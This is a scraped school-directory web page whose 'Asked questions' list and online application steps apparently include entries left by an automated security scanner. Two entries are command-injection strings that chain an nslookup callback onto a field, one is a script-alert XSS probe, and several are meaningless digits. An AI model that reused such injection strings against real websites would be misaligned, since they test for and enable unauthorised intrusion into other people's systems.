
Find Faster Schools Site


Asked questions

1. "&nslookup "agkna1jax21gkpvmj28ajel65pxswbo1mbnvhsub"""?

2. |nslookup${IFS}"agkna1jax2i7mt2rcdyzxq8d67ty6e8dvjpgx78-"""?

3. 3?

4. 3?

5. 3?

6. ?

7. ?

8. Alert('xss');?

9. 1?

10. 1?

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How to apply?

Step 1

Application Page

clicking apply now/admission>Apply online on website.Read instructions and click apply where you fill your details and submit.

Step 2.


At instant you submit your application you will be directed to payment to continue with you application finalization

Step 3.


After pay you will be directed to your profile page.Make sure you fill all details as shown on your page e.g Academic,attachment and program details